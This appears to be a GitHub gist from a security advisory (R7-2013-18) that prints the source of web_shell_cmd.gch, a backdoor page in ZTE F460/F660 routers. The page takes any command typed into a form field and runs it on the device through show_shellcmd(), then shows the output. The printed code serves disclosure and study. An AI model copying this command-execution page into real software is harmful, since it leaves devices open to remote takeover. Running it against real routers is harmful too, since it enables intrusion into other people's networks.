R7-2013-18, ZTE F460 and ZTE F660 web_shell_cmd.gch Backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
| <html xmlns="http://www.w3.org/1999/xhtml"> | |
| <head> | |
| <META HTTP-EQUIV="pragma" CONTENT="no-cache"> | |
| <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate"> | |
| <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> | |
| <title> | |
| F460 Webshell | |
| </title> | |
| <LINK REL="stylesheet" HREF="css/login.css" TYPE="text/css" /> | |
| <LINK REL="stylesheet" HREF="css/template.css" TYPE="text/css" /> | |
| <style> | |
| * { | |
| margin: 0 0 0 0; | |
| padding: 0; | |
| } | |
| .textarea_1 { | |
| height:420px; | |
| width:794px; | |
| border:1px solid #7F9DB7; | |
| font-size: 12px; | |
| font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; | |
| text-align:left; | |
| } | |
| #e8_container { | |
| margin: 0 auto; | |
| width: 800px; | |
| text-align: left; | |
| position: relative; | |
| min-height: 600px; | |
| height: 600px; | |
| height: 600px; | |
| } | |
| #banner { | |
| width:800px; | |
| height:70px; | |
| } | |
| .bottom_td3 { | |
| width:800px; | |
| background-color:#eeeeee; | |
| margin-right:2px; | |
| text-align:right; | |
| } | |
| .copyright { | |
| float:left; | |
| display:block; | |
| height:16px; | |
| width:800px; | |
| padding-top:10px; | |
| border-left:1px solid #B1B1B1; | |
| border-right:1px solid #B1B1B1; | |
| text-align:center; | |
| } | |
| .bottom_line { | |
| float:left; | |
| display:block; | |
| background-color:#5aa929; | |
| height:8px; | |
| width:800px; | |
| } | |
| .type{ | |
| position:absolute; | |
| top:32px;left:540px; | |
| font:20px Arial,sans-serif; | |
| color:#fff;z-index:999; | |
| } | |
| .inputId { | |
| width:720px; | |
| } | |
| table.table td.td11 { | |
| width:30%; | |
| height:24px; | |
| text-align:right; | |
| } | |
| </style> | |
| <script language="javascript"> | |
| function getObj(id) { | |
| return (document.getElementById(id)); | |
| } | |
| function jslSetValue(src, dst) { | |
| var ss = document.getElementById(dst).value; | |
| document.getElementById(src).value = ss; | |
| } | |
| function setValue(id, value) { | |
| document.getElementById(id).value = value; | |
| } | |
| function Transfer_meaning(id, value) { | |
| document.getElementById(id).value = value; | |
| } | |
| function getValue(id) { | |
| return (document.getElementById(id).value); | |
| } | |
| function jslDisable(id) { | |
| var i; | |
| var num = jslDisable.arguments.length; | |
| if (num == 0) return; | |
| for (i = 0; i < num; i++) { | |
| document.getElementById(arguments[i]).disabled = true; | |
| } | |
| } | |
| var CMD_PARA = new Array( | |
| "Cmd", | |
| "CmdAck" | |
| ); | |
| function pageLoad(url) { | |
| getObj("running").style.display = "none"; | |
| } | |
| function pageSetValue() { | |
| jslSetValue("Cmd", "Frm_Cmd"); | |
| } | |
| function pageSubmit() { | |
| jslDisable("Btn_Submit"); | |
| pageSetValue(); | |
| setValue("IF_ACTION", "apply"); | |
| getObj("running").style.display = ""; | |
| getObj("running_title").innerHTML = "it is running, please wait..."; | |
| getObj("fSubmit").submit(); | |
| } | |
| </script> | |
| <% | |
| IMPORT FILE "common_gch.gch"; | |
| var FP_ERRORSTR = "SUCC"; | |
| var FP_PARANUM = 2; | |
| var PARA[2] = | |
| { | |
| "Cmd", | |
| "CmdAck" | |
| }; | |
| create_form_start("fSubmit", "'/web_shell_cmd.gch'"); | |
| createBasicHidden(); | |
| create_hidden_newpara(PARA, FP_PARANUM); | |
| var CmdAck=""; | |
| var Cmd = request("Cmd"); | |
| var FP_ACTION = request("IF_ACTION"); | |
| if(FP_ACTION == "apply") | |
| { | |
| CmdAck = show_shellcmd(Cmd); | |
| } | |
| getDisplayInstError(FP_ERRORSTR); | |
| undoDBSave(); | |
| create_form_end(); | |
| %> | |
| </head> | |
| <body> | |
| <div id="e8_container" style="background-color:#eeeeee;"> | |
| <div id="head"> | |
| <div id="banner" style="background-image:url(img/banner.gif); background-repeat:no-repeat"></div> | |
| </div> | |
| <table class="table" width="500px" border="0" align="center"> | |
| <tr> | |
| </tr> | |
| <tr id="running" class="white" style="display: none;"> | |
| <td> | |
| <font id="running_title" style="display: ;"></font> <img src="img/uploading.gif"> | |
| </td> | |
| </tr> | |
| <tr> | |
| <td class="td3" colspan="2"> | |
| </td> | |
| </tr> | |
| <tr> | |
| <td class="td11" id="Fnt_Cmd">Command: </td> | |
| <td class="td2"> | |
| <input name="textfield22" type="text" id="Frm_Cmd" class="inputId" value="" size="150" /> | |
| </td> | |
| </tr> | |
| <tr> | |
| <td colspan="2" align="right"> | |
| <input name='Submit' type='button' id='Btn_Submit' onclick=pageSubmit() class='button' value=' Submit ' /></td> | |
| </tr> | |
| <br> | |
| <tr> | |
| <td class="td3" colspan="2"> | |
| <textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1"><%=CmdAck;%></textarea> | |
| </td> | |
| </tr> | |
| </table> | |
| <br> | |
| </div> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment